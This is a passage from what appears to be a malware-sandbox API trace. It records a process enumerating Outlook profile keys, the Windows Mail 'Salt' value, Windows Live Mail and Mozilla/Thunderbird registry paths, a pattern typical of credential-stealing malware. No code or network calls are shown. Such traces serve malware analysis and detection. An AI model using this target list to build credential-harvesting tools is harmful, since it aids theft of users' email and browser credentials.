lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="f86ed2903a4a11cfb57e524153480001", lpcchName=0x52d2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.225] lstrlenW (lpString="\\") returned 1 [0590.225] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0590.225] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5d7c90 [0590.225] lstrlenW (lpString="f86ed2903a4a11cfb57e524153480001") returned 32 [0590.225] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\") returned 56 [0590.225] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56cab0 [0590.225] LocalFree (hMem=0x5d7c90) returned 0x0 [0590.225] lstrlenW (lpString="") returned 0 [0590.225] lstrlenW (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001") returned 88 [0590.225] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x2ed9860 [0590.225] LocalFree (hMem=0x56cab0) returned 0x0 [0590.225] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", phkResult=0x52c2ac | out: phkResult=0x52c2ac*=0x2e4) returned 0x0 [0590.225] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x0, lpName=0x52c2b0, lpcchName=0x52c2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="00000003", lpcchName=0x52c2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.225] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.225] LocalFree (hMem=0x2ed9860) returned 0x0 [0590.225] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0xe, lpName=0x52d2ec, lpcchName=0x52d2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="f86ed2903a4a11cfb57e524153480001", lpcchName=0x52d2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.226] RegCloseKey (hKey=0x4d0) returned 0x0 [0590.226] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Mail", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e334 | out: phkResult=0x52e334*=0x4d0) returned 0x0 [0590.226] RegQueryValueExW (in: hKey=0x4d0, lpValueName="Salt", lpReserved=0x0, lpType=0x52e31c, lpData=0x0, lpcbData=0x52e330*=0x383888 | out: lpType=0x52e31c*=0x0, lpData=0x0, lpcbData=0x52e330*=0x0) returned 0x2 [0590.226] RegCloseKey (hKey=0x4d0) returned 0x0 [0590.226] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Mail", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e308 | out: phkResult=0x52e308*=0x4d0) returned 0x0 [0590.226] RegQueryValueExW (in: hKey=0x4d0, lpValueName="Salt", lpReserved=0x0, lpType=0x52e2f0, lpData=0x0, lpcbData=0x52e304*=0x383888 | out: lpType=0x52e2f0*=0x0, lpData=0x0, lpcbData=0x52e304*=0x0) returned 0x2 [0590.226] RegCloseKey (hKey=0x4d0) returned 0x0 [0590.226] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Mail", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e2dc | out: phkResult=0x52e2dc*=0x4d0) returned 0x0 [0590.226] RegQueryValueExW (in: hKey=0x4d0, lpValueName="Salt", lpReserved=0x0, lpType=0x52e2c4, lpData=0x0, lpcbData=0x52e2d8*=0x383888 | out: lpType=0x52e2c4*=0x0, lpData=0x0, lpcbData=0x52e2d8*=0x0) returned 0x2 [0590.226] RegCloseKey (hKey=0x4d0) returned 0x0 [0590.226] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Live Mail", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e328 | out: phkResult=0x52e328*=0x0) returned 0x2 [0590.226] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Live Mail", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2fc | out: phkResult=0x52e2fc*=0x0) returned 0x2 [0590.226] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Live Mail", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e2d0 | out: phkResult=0x52e2d0*=0x0) returned 0x2 [0590.226] StrStrIW (lpFirst="Software\\Mozilla", lpSrch="Thunderbird") returned 0x0 [0590.226] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x5e5080 [0590.226] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla", phkResult=0x52e324 | out: phkResult=0x52e324*=0x4d0) returned 0x0 [0590.226] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x0, lpName=0x5e5080, lpcchName=0x52e320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Firefox", lpcchName=0x52e320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.226] lstrlenW (lpString="\\") returned 1 [0590.226] lstrlenW (lpString="Software\\Mozilla") returned 16 [0590.227] LocalAlloc (uFlags=0x40, uBytes=0xa4) returned 0x5d3958 [0590.227] lstrlenW (lpString="Firefox") returned 7 [0590.227] lstrlenW (lpString="Software\\Mozilla\\") returned 17 [0590.227] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0x2ed72a0 [0590.227] LocalFree (hMem=0x5d3958) returned 0x0 [0590.227] StrStrIW (lpFirst="Software\\Mozilla\\Firefox", lpSrch="Thunderbird") returned 0x0 [0590.227] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x2edb848 [0590.227] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox", phkResult=0x52e2e8 | out: phkResult=0x52e2e8*=0x2e4) returned 0x0 [0590.227] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x0, lpName=0x2edb848, lpcchName=0x52e2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Crash Reporter", lpcchName=0x52e2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.227] lstrlenW (lpString="\\") returned 1 [0590.227] lstrlenW (lpString="Software\\Mozilla\\Firefox") returned 24 [0590.227] LocalAlloc (uFlags=0x40, uBytes=0xb4) returned 0x2ed7360 [0590.227] lstrlenW (lpString="Crash Reporter") returned 14 [0590.227] lstrlenW (lpString="Software\\Mozilla\\Firefox\\") returned 25 [0590.227] LocalAlloc (uFlags=0x40, uBytes=0xd0) returned 0x5977a0 [0590.227] LocalFree (hMem=0x2ed7360) returned 0x0 [0590.227] StrStrIW (lpFirst="Software\\Mozilla\\Firefox\\Crash Reporter", lpSrch="Thunderbird") returned 0x0 [0590.227] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x2edc8d0 [0590.227] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox\\Crash Reporter", phkResult=0x52e2ac | out: phkResult=0x52e2ac*=0x664) returned 0x0 [0590.227] RegEnumKeyExW (in: hKey=0x664, dwIndex=0x0, lpName=0x2edc8d0, lpcchName=0x52e2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52e2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.227] RegCloseKey (hKey=0x664) returned 0x0 [0590.227] LocalFree (hMem=0x2edc8d0) returned 0x0 [0590.227] LocalFree (hMem=0x5977a0) returned 0x0 [0590.227] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x1, lpName=0x2edb848, lpcchName=0x52e2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TaskBarIDs", lpcchName=0x52e2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.227] lstrlenW (lpString="\\") returned 1 [0590.227] lstrlenW (lpString="Software\\Mozilla\\Firefox") returned 24 [0590.227] LocalAlloc (uFlags=0x40, uBytes=0xb4) returned 0x2ed7360 [0590.227] lstrlenW (lpString="TaskBarIDs") returned 10 [0590.227] lstrlenW (lpString="Software\\Mozilla\\Firefox\\") returned 25 [0590.227] LocalAlloc (uFlags=0x40, uBytes=0xc8) returned 0x5d5258 [0590.227] LocalFree (hMem=0x2ed7360) returned 0x0 [0590.227] StrStrIW (lpFirst="Software\\Mozilla\\Firefox\\TaskBarIDs", lpSrch="Thunderbird") returned 0x0 [0590.227] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x2edc8d0 [0590.227] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", phkResult=0x52e2ac | out: phkResult=0x52e2ac*=0x664) returned 0x0 [0590.227] RegEnumKeyExW (in: hKey=0x664, dwIndex=0x0, lpName=0x2edc8d0, lpcchName=0x52e2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52e2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.227] RegCloseKey (hKey=0x664) returned 0x0 [0590.227] LocalFree (hMem=0x2edc8d0) returned 0x0 [0590.227] LocalFree (hMem=0x5d5258) returned 0x0 [0590.228] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x2, lpName=0x2edb848, lpcchName=0x52e2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TaskBarIDs", lpcchName=0x52e2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.228] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.228] LocalFree (hMem=0x2edb848) returned 0x0 [0590.228] LocalFree (hMem=0x2ed72a0) returned 0x0 [0590.228] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x1, lpName=0x5e5080, lpcchName=0x52e320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Firefox", lpcchName=0x52e320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.228] RegCloseKey (hKey=0x4d0) returned 0x0 [0590.228] LocalFree (hMem=0x5e5080) returned 0x0 [0590.228] StrStrIW (lpFirst="Software\\Mozilla", lpSrch="Thunderbird") returned 0x0 [0590.228] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x5e5080 [0590.228] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla", phkResult=0x52e310 | out: phkResult=0x52e310*=0x4d0) returned 0x0 [0590.228] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x0, lpName=0x5e5080, lpcchName=0x52e30c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Firefox", lpcchName=0x52e30c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.228] lstrlenW (lpString="\\") returned 1 [0590.228] lstrlenW (lpString="Software\\Mozilla") returned 16 [0590.228] LocalAlloc (uFlags=0x40, uBytes=0xa4) returned 0x5d3958 [0590.228] lstrlenW (lpString="Firefox") returned 7 [0590.228] lstrlenW (lpString="Software\\Mozilla\\") returned 17 [0590.228] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0x2ed7060 [0590.228] LocalFree (hMem=0x5d3958) returned 0x0 [0590.228] StrStrIW (lpFirst="Software\\Mozilla\\Firefox", lpSrch="Thunderbird") returned 0x0 [0590.228] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x2edb848 [0590.228] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Firefox", phkResult=0x52e2d4 | out: phkResult=0x52e2d4*=0x2e4) returned 0x0 [0590.228] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x0, lpName=0x2edb848, lpcchName=0x52e2d0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TaskBarIDs", lpcchName=0x52e2d0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.228] lstrlenW (lpString="\\") returned 1 [0590.228] lstrlenW (lpString="Software\\Mozilla\\Firefox") returned 24 [0590.228] LocalAlloc (uFlags=0x40, uBytes=0xb4) returned 0x2ed7120 [0590.228] lstrlenW (lpString="TaskBarIDs") returned 10 [0590.228] lstrlenW (lpString="Software\\Mozilla\\Firefox\\") returned 25 [0590.228] LocalAlloc (uFlags=0x40, uBytes=0xc8) returned 0x5d5258 [0590.228] LocalFree (hMem=0x2ed7120) returned 0x0 [0590.228] StrStrIW (lpFirst="Software\\Mozilla\\Firefox\\TaskBarIDs", lpSrch="Thunderbird") returned 0x0 [0590.228] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x2edc8d0 [0590.228] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", phkResult=0x52e298 | out: phkResult=0x52e298*=0x664) returned 0x0 [0590.228] RegEnumKeyExW (in: hKey=0x664, dwIndex=0x0, lpName=0x2edc8d0, lpcchName=0x52e294, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52e294, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.228] RegCloseKey (hKey=0x664) returned 0x0 [0590.228] LocalFree (hMem=0x2edc8d0) returned 0x0 [0590.228] LocalFree (hMem=0x5d5258) returned 0x0 [0590.228] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x1, lpName=0x2edb848, lpcchName=0x52e2d0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TaskBarIDs", lpcchName=0x52e2d0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.228] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.228] LocalFree (hMem=0x2edb848) returned 0x0 [0590.229] LocalFree (hMem=0x2ed7060) returned 0x0 [0590.229] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x1, lpName=0x5e5080, lpcchName=0x52e30c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla Firefox", lpcchName=0x52e30c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.229] lstrlenW (lpString="\\") returned 1 [0590.229] lstrlenW (lpString="Software\\Mozilla") returned 16 [0590.229] LocalAlloc (uFlags=0x40, uBytes=0xa4) returned 0x5d3958 [0590.229] lstrlenW (lpString="Mozilla Firefox") returned 15 [0590.229] lstrlenW (lpString="Software\\Mozilla\\") returned 17 [0590.229] LocalAlloc (uFlags=0x40, uBytes=0xc2) returned 0x5d5258 [0590.229] LocalFree (hMem=0x5d3958) returned 0x0 [0590.229] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox", lpSrch="Thunderbird") returned 0x0 [0590.229] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x2edb848 [0590.229] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox", phkResult=0x52e2d4 | out: phkResult=0x52e2d4*=0x2e4) returned 0x0 [0590.229] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x0, lpName=0x2edb848, lpcchName=0x52e2d0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="25.0 (en-US)", lpcchName=0x52e2d0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.229] lstrlenW (lpString="\\") returned 1 [0590.229] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox") returned 32 [0590.229] LocalAlloc (uFlags=0x40, uBytes=0xc4) returned 0x5d73b0 [0590.229] lstrlenW (lpString="25.0 (en-US)") returned 12 [0590.229] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\") returned 33 [0590.229] LocalAlloc (uFlags=0x40, uBytes=0xdc) returned 0x2ed0060 [0590.229] LocalFree (hMem=0x5d73b0) returned 0x0 [0590.229] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)", lpSrch="Thunderbird") returned 0x0 [0590.229] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x2edc8d0 [0590.229] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)", phkResult=0x52e298 | out: phkResult=0x52e298*=0x664) returned 0x0 [0590.229] RegEnumKeyExW (in: hKey=0x664, dwIndex=0x0, lpName=0x2edc8d0, lpcchName=0x52e294, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Main", lpcchName=0x52e294, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.229] lstrlenW (lpString="\\") returned 1 [0590.229] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)") returned 45 [0590.229] LocalAlloc (uFlags=0x40, uBytes=0xde) returned 0x2ed0148 [0590.229] lstrlenW (lpString="Main") returned 4 [0590.229] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\") returned 46 [0590.229] LocalAlloc (uFlags=0x40, uBytes=0xe6) returned 0x2ed2ab0 [0590.229] LocalFree (hMem=0x2ed0148) returned 0x0 [0590.229] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Main", lpSrch="Thunderbird") returned 0x0 [0590.229] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x2edd958 [0590.229] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Main", phkResult=0x52e25c | out: phkResult=0x52e25c*=0x5ac) returned 0x0 [0590.229] RegEnumKeyExW (in: hKey=0x5ac, dwIndex=0x0, lpName=0x2edd958, lpcchName=0x52e258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52e258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.229] RegCloseKey (hKey=0x5ac) returned 0x0 [0590.229] LocalFree (hMem=0x2edd958) returned 0x0 [0590.229] LocalFree (hMem=0x2ed2ab0) returned 0x0 [0590.229] RegEnumKeyExW (in: hKey=0x664, dwIndex=0x1, lpName=0x2edc8d0, lpcchName=0x52e294, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Uninstall", lpcchName=0x52e294, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.229] lstrlenW (lpString="\\") returned 1 [0590.229] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)") returned 45 [0590.229] LocalAlloc (uFlags=0x40, uBytes=0xde) returned 0x2ed0148 [0590.229] lstrlenW (lpString="Uninstall") returned 9 [0590.230] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\") returned 46 [0590.230] LocalAlloc (uFlags=0x40, uBytes=0xf0) returned 0x5e6f98 [0590.230] LocalFree (hMem=0x2ed0148) returned 0x0 [0590.230] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Uninstall", lpSrch="Thunderbird") returned 0x0 [0590.230] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x2edd958 [0590.230] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox\\25.0 (en-US)\\Uninstall", phkResult=0x52e25c | out: phkResult=0x52e25c*=0x5ac) returned 0x0 [0590.230] RegEnumKeyExW (in: hKey=0x5ac, dwIndex=0x0, lpName=0x2edd958, lpcchName=0x52e258, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52e258, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.230] RegCloseKey (hKey=0x5ac) returned 0x0 [0590.230] LocalFree (hMem=0x2edd958) returned 0x0 [0590.230] LocalFree (hMem=0x5e6f98) returned 0x0 [0590.230] RegEnumKeyExW (in: hKey=0x664, dwIndex=0x2, lpName=0x2edc8d0, lpcchName=0x52e294, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Uninstall", lpcchName=0x52e294, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.230] RegCloseKey (hKey=0x664) returned 0x0 [0590.230] LocalFree (hMem=0x2edc8d0) returned 0x0 [0590.230] LocalFree (hMem=0x2ed0060) returned 0x0 [0590.230] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x1, lpName=0x2edb848, lpcchName=0x52e2d0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="25.0 (en-US)", lpcchName=0x52e2d0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.230] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.230] LocalFree (hMem=0x2edb848) returned 0x0 [0590.230] LocalFree (hMem=0x5d5258) returned 0x0 [0590.230] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x2, lpName=0x5e5080, lpcchName=0x52e30c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla Firefox 25.0", lpcchName=0x52e30c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.230] lstrlenW (lpString="\\") returned 1 [0590.230] lstrlenW (lpString="Software\\Mozilla") returned 16 [0590.230] LocalAlloc (uFlags=0x40, uBytes=0xa4) returned 0x5d3958 [0590.230] lstrlenW (lpString="Mozilla Firefox 25.0") returned 20 [0590.230] lstrlenW (lpString="Software\\Mozilla\\") returned 17 [0590.230] LocalAlloc (uFlags=0x40, uBytes=0xcc) returned 0x5977a0 [0590.230] LocalFree (hMem=0x5d3958) returned 0x0 [0590.230] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox 25.0", lpSrch="Thunderbird") returned 0x0 [0590.230] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x2edb848 [0590.230] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0", phkResult=0x52e2d4 | out: phkResult=0x52e2d4*=0x2e4) returned 0x0 [0590.230] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x0, lpName=0x2edb848, lpcchName=0x52e2d0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="bin", lpcchName=0x52e2d0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.230] lstrlenW (lpString="\\") returned 1 [0590.230] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox 25.0") returned 37 [0590.230] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x597878 [0590.230] lstrlenW (lpString="bin") returned 3 [0590.230] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox 25.0\\") returned 38 [0590.230] LocalAlloc (uFlags=0x40, uBytes=0xd4) returned 0x5dbdf0 [0590.230] LocalFree (hMem=0x597878) returned 0x0 [0590.230] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox 25.0\\bin", lpSrch="Thunderbird") returned 0x0 [0590.230] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x2edc8d0 [0590.230] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0\\bin", phkResult=0x52e298 | out: phkResult=0x52e298*=0x664) returned 0x0 [0590.230] RegEnumKeyExW (in: hKey=0x664, dwIndex=0x0, lpName=0x2edc8d0, lpcchName=0x52e294, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52e294, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.231] RegCloseKey (hKey=0x664) returned 0x0 [0590.231] LocalFree (hMem=0x2edc8d0) returned 0x0 [0590.231] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.231] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x1, lpName=0x2edb848, lpcchName=0x52e2d0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="extensions", lpcchName=0x52e2d0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0590.231] lstrlenW (lpString="\\") returned 1 [0590.231] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox 25.0") returned 37 [0590.231] LocalAlloc (uFlags=0x40, uBytes=0xce) returned 0x597878 [0590.231] lstrlenW (lpString="extensions") returned 10 [0590.231] lstrlenW (lpString="Software\\Mozilla\\Mozilla Firefox 25.0\\") returned 38 [0590.231] LocalAlloc (uFlags=0x40, uBytes=0xe2) returned 0x2ed2ab0 [0590.231] LocalFree (hMem=0x597878) returned 0x0 [0590.231] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox 25.0\\extensions", lpSrch="Thunderbird") returned 0x0 [0590.231] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x2edc8d0 [0590.231] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox 25.0\\extensions", phkResult=0x52e298 | out: phkResult=0x52e298*=0x664) returned 0x0 [0590.231] RegEnumKeyExW (in: hKey=0x664, dwIndex=0x0, lpName=0x2edc8d0, lpcchName=0x52e294, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52e294, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.231] RegCloseKey (hKey=0x664) returned 0x0 [0590.231] LocalFree (hMem=0x2edc8d0) returned 0x0 [0590.231] LocalFree (hMem=0x2ed2ab0) returned 0x0 [0590.231] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x2, lpName=0x2edb848, lpcchName=0x52e2d0, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="extensions", lpcchName=0x52e2d0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.231] RegCloseKey (hKey=0x2e4) returned 0x0 [0590.231] LocalFree (hMem=0x2edb848) returned 0x0 [0590.231] LocalFree (hMem=0x5977a0) returned 0x0 [0590.231] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x3, lpName=0x5e5080, lpcchName=0x52e30c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla Firefox 25.0", lpcchName=0x52e30c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0590.231] RegCloseKey (hKey=0x4d0) returned 0x0 [0590.231] LocalFree (hMem=0x5e5080) returned 0x0 [0590.231] LocalFree (hMem=0x57c650) returned 0x0 [0590.231] LocalFree (hMem=0x57c5c0) returned 0x0 [0590.231] LocalFree (hMem=0x57c530) returned 0x0 [0590.231] LocalFree (hMem=0x57c4a0) returned 0x0 [0590.231] LocalFree (hMem=0x57c410) returned 0x0 [0590.231] LocalFree (hMem=0x57c380) returned 0x0 [0590.231] LocalFree (hMem=0x57c2f0) returned 0x0 [0590.231] LocalFree (hMem=0x57c260) returned 0x0 [0590.231] LocalFree (hMem=0x57c1d0) returned 0x0 [0590.231] LocalFree (hMem=0x57c140) returned 0x0 [0590.231] LocalFree (hMem=0x57c0b0) returned 0x0 [0590.231] LocalFree (hMem=0x57c020) returned 0x0 [0590.231] LocalFree (hMem=0x57bf90) returned 0x0 [0590.231] LocalFree (hMem=0x57bf00) returned 0x0 [0590.231] LocalFree (hMem=0x57be70) returned 0x0 [0590.231] LocalFree (hMem=0x57bde0) returned 0x0 [0590.231] LocalFree (hMem=0x57bd50) returned 0x0 [0590.231] LocalFree (hMem=0x57bcc0) returned 0x0 [0590.231] StrStrIW (lpFirst="Software\\Mozilla", lpSrch="Firefox") returned 0x0 [0590.231] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x5e5080 [0590.232] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla", phkResult=0x52e314 | out: phkResult=0x52e314*=0x4d0) returned 0x0 [0590.232] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x0, lpName=0x5e5080, lpcchName=0x52e310, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Firefox", lpcchName=0x52e310, lpClass=0x0, 